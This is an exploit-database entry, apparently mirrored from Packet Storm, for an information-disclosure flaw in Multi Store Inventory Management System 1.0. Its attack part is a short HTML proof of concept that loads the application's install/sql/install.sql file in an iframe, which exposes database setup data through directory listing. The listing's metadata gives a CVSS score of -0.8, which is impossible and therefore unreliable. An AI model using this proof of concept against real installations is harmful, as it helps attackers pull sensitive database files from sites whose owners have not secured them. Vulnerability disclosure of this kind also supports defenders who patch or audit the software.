Exploit for Multi Store Inventory Management System 1.0 Information Disclosure

Name: Exploit for Multi Store Inventory Management System 1.0 Information Disclosure
Rating: 5 (229 reviews)

2022-04-05 | CVSS -0.8

## https://sploitus.com/exploit?id=PACKETSTORM:166590
# Exploit Title: Multi Store Inventory Management System - Information Disclosure  
# Date: 04/04/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage: https://www.bdtask.com/  
# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/  
# Version: 1.0  
# Tested on: XAMPP, Windows 10  
# Contact: https://twitter.com/dmaral3noz  
  
# Description :  
  
The application allows directory listing and information disclosure of  
some sensitive files that can allow an attacker to leverage the disclosed  
information.  
  
  
################################################  
  
PoC Html :  
  
<html>  
<head><body>  
<title>Multi Store Inventory Management System - Information Disclosure</title>  
<iframe  
src=http://127.0.0.1/multistore_demo/install/sql/install.sql>  
</body></head>  
<html>